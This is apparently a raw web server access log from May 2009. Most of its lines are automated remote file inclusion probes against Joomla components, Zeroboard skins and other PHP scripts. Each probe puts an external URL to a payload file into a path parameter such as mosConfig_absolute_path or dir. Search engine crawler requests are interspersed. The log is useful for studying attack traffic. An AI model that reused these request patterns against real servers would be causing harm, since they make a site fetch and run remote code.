216.117.191.71 - - [12/May/2009:23:08:39 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
87.106.135.14 - - [12/May/2009:23:09:16 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
87.106.135.14 - - [12/May/2009:23:09:17 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
66.219.97.207 - - [12/May/2009:23:09:23 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
66.219.97.207 - - [12/May/2009:23:09:23 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
88.191.103.144 - - [12/May/2009:23:10:30 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:23:10:30 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.825"
217.18.76.16 - - [12/May/2009:23:10:31 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:23:10:31 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
88.191.103.144 - - [12/May/2009:23:13:12 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 189195 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:23:13:12 -0500] "GET //?path%5Bdocroot%5D=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
66.249.67.180 - - [12/May/2009:23:13:31 -0500] "GET /logs/access_log.1147132800 HTTP/1.1" 200 2801 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.158 - - [12/May/2009:23:14:07 -0500] "GET /logs/access_log.1223596800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.187.232.189 - - [12/May/2009:23:16:32 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
93.187.232.189 - - [12/May/2009:23:16:32 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
93.187.232.189 - - [12/May/2009:23:16:47 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
93.187.232.189 - - [12/May/2009:23:16:47 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
69.172.126.16 - - [12/May/2009:23:22:47 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:23:22:48 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
122.153.212.195 - - [12/May/2009:23:23:52 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:23:23:56 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:23:23:58 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.249.67.180 - - [12/May/2009:23:24:06 -0500] "GET /logs/access_log.1144886400 HTTP/1.1" 200 1400 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.37.188.74 - - [12/May/2009:23:24:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.readingastro.org.uk/graphics/moon/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
200.37.188.74 - - [12/May/2009:23:24:46 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.readingastro.org.uk/graphics/moon/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
201.92.219.118 - - [12/May/2009:23:25:01 -0500] "GET /logs/access_log.1234915200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:25:01 -0500] "GET /logs/access_log.1230076800http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:26:35 -0500] "GET /logs/access_log.1237334400http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:26:38 -0500] "GET /logs/access_log.1237939200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:27:05 -0500] "GET /logs/access_log.1230076800http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:27:05 -0500] "GET /logs/access_log.1234915200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:27:07 -0500] "GET /logs/access_log.1234915200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:27:21 -0500] "GET /logs/access_log.1234915200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:27:22 -0500] "GET /logs/access_log.1234915200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:27:50 -0500] "GET /logs/access_log.1234224000http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:27:50 -0500] "GET /logs/access_log.1234224000http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.219.118 - - [12/May/2009:23:28:00 -0500] "GET /logs/access_log.1234915200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
66.249.67.180 - - [12/May/2009:23:29:23 -0500] "GET /logs/access_log.1197763200 HTTP/1.1" 200 1831 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
145.253.245.211 - - [12/May/2009:23:30:55 -0500] "GET /logs/index.php?option=com_dbquery&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
145.253.245.211 - - [12/May/2009:23:30:56 -0500] "GET /index.php?option=com_dbquery&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
145.253.245.211 - - [12/May/2009:23:31:31 -0500] "GET /logs/index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
145.253.245.211 - - [12/May/2009:23:31:32 -0500] "GET /index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
202.75.4.169 - - [12/May/2009:23:32:13 -0500] "GET /logs/index.php?option=com_dbquery&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [12/May/2009:23:32:14 -0500] "GET /index.php?option=com_dbquery&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
218.185.20.88 - - [12/May/2009:23:32:38 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:23:32:38 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:23:32:38 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:23:32:51 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.249.67.180 - - [12/May/2009:23:34:42 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [12/May/2009:23:34:42 -0500] "GET /logs/access_log.1206403200 HTTP/1.1" 200 847 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.119.158.133 - - [12/May/2009:23:35:09 -0500] "GET /logs/access_log.1231545600//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.119.158.133 - - [12/May/2009:23:35:09 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.119.158.133 - - [12/May/2009:23:35:09 -0500] "GET //skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.119.158.133 - - [12/May/2009:23:35:18 -0500] "GET /logs/access_log.1233187200//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.119.158.133 - - [12/May/2009:23:35:18 -0500] "GET //skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.119.158.133 - - [12/May/2009:23:35:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.119.158.133 - - [12/May/2009:23:35:18 -0500] "GET /logs/access_log.1231545600//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.119.158.133 - - [12/May/2009:23:35:27 -0500] "GET /logs/access_log.1233187200//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:23:37:29 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:23:37:29 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:23:37:29 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:23:37:38 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.249.67.180 - - [12/May/2009:23:39:58 -0500] "GET /logs/access_log.1152403200 HTTP/1.1" 200 917 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.143.98.5 - - [12/May/2009:23:41:24 -0500] "GET //skin/zero_vote/error.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
123.143.98.5 - - [12/May/2009:23:41:24 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
123.143.98.5 - - [12/May/2009:23:41:24 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:41:28 -0500] "GET //?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:41:28 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:41:28 -0500] "GET /logs//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 189195 "-""Mozilla/5.0"
123.143.98.5 - - [12/May/2009:23:41:32 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
123.143.98.5 - - [12/May/2009:23:41:39 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
123.143.98.5 - - [12/May/2009:23:41:39 -0500] "GET //skin/zero_vote/error.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
123.143.98.5 - - [12/May/2009:23:41:39 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
123.143.98.5 - - [12/May/2009:23:41:47 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.211 - - [12/May/2009:23:43:22 -0500] "GET /logs/access_log.1197417600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.89.33.167 - - [12/May/2009:23:44:09 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:44:09 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:44:09 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:44:16 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:44:16 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:44:16 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:44:39 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:44:43 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:45:13 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:45:13 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:45:13 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:45:37 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:23:45:45 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:23:45:45 -0500] "GET //skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:23:45:45 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:23:45:46 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:46:12 -0500] "GET //?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:46:12 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:46:13 -0500] "GET /logs//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 189195 "-""Mozilla/5.0"
88.191.48.81 - - [12/May/2009:23:46:26 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
88.191.48.81 - - [12/May/2009:23:46:26 -0500] "GET //skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
88.191.48.81 - - [12/May/2009:23:46:26 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
88.191.48.81 - - [12/May/2009:23:46:26 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.246.55.235 - - [12/May/2009:23:46:43 -0500] "GET //skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.246.55.235 - - [12/May/2009:23:46:43 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
216.246.55.235 - - [12/May/2009:23:46:44 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.246.55.235 - - [12/May/2009:23:47:00 -0500] "GET /logs/access_log.1233964800//skin/zero_vote/error.php?dir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:23:48:40 -0500] "GET //skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:23:48:40 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:23:48:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:23:48:41 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.208.133 - - [12/May/2009:23:48:52 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [12/May/2009:23:48:52 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 200 1755 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [12/May/2009:23:48:52 -0500] "GET /logs/access_log.1106352000 HTTP/1.1" 200 22913 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [12/May/2009:23:48:52 -0500] "GET /logs/access_log.1182643200 HTTP/1.1" 200 329 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [12/May/2009:23:48:52 -0500] "GET /logs/access_log.1221696000 HTTP/1.1" 200 2360 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.89.33.167 - - [12/May/2009:23:49:29 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:49:29 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:49:29 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:49:40 -0500] "GET //?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:49:40 -0500] "GET /logs/access_log.1237680000//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:49:41 -0500] "GET /logs//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 189195 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:49:41 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:49:42 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:49:42 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.249.36.194 - - [12/May/2009:23:49:47 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
218.249.36.194 - - [12/May/2009:23:49:47 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.249.36.194 - - [12/May/2009:23:49:47 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.249.36.194 - - [12/May/2009:23:49:47 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
84.201.208.50 - - [12/May/2009:23:49:47 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
84.201.208.50 - - [12/May/2009:23:49:47 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
84.201.208.50 - - [12/May/2009:23:49:47 -0500] "GET /logs/access_log.1238457600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
84.201.208.50 - - [12/May/2009:23:49:47 -0500] "GET /logs/access_log.1238803200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:49:54 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:23:50:03 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
88.191.48.81 - - [12/May/2009:23:50:04 -0500] "GET //skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
88.191.48.81 - - [12/May/2009:23:50:04 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
88.191.48.81 - - [12/May/2009:23:50:04 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.114.112.155 - - [12/May/2009:23:50:18 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.114.112.155 - - [12/May/2009:23:50:18 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
